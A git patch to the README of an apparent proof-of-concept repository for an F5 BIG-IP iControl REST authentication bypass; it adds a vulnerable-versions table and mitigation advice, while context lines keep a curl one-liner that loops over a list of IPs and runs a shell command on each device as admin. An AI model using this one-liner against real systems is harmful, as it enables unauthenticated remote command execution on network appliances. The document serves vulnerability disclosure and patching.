From 59b2022e4225b0071533500ab313c391d2257f4b Mon Sep 17 00:00:00 2001
From: Geno Shamugia <48299520+shamo0@users.noreply.github.com>
Date: Tue, 10 May 2022 05:09:23 -0400
Subject: [PATCH] Update README.MD

---
 README.MD | 24 +++++++++++++++++++++++-
 1 file changed, 23 insertions(+), 1 deletion(-)

diff --git a/README.MD b/README.MD
index cf41223..ccc4fad 100644
--- a/README.MD
+++ b/README.MD
@@ -6,12 +6,34 @@ This vulnerability may allow an unauthenticated attacker with network access to
 
 ## PoC
 
-You can use the following curl one liner to check for the F5 BigIP vulnerability or use the provided python script.
+You can use the following curl one liner to check for the F5 Big-IP vulnerability or use the provided python script.
 
 ```bash
 cat ips.txt | while read ip; do curl -su admin -H "Content-Type: application/json" http://$ip/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}';done
 ```
 
+## Vulnerable Versions (Big-IP)
+
+| Branch | Vulnerable Versions | Fixes Introduced |
+| ---- | ----| ---- |
+|11.x|11.6.1-11.6.5|No Fix|
+|12.x|12.1.0-12.1.6|No Fix|
+|13.x|13.1.0-13.1.4|13.1.5|
+|14.x|14.1.0-14.1.4|14.1.4.6|
+|15.x|15.1.0-15.1.5|15.1.5.1|
+|16.x|16.1.0-16.1.2|16.1.2.2|
+|17.x|None|17.0.0|
+
+## Mitigation
+
+<ul>
+  <li>Upgrade to the fixed version in ```Fixes Introduced``` Column. (Preferred Method)</li>
+  <li>Block iControl REST access through the self IP address</li>
+  <li>Block iControl REST access through the management interface</li>
+  <li>Modify the BIG-IP httpd configuration</li>
+</ul>
+
+For more information about mitigation check out the references. 
 
 ## References
 <ul>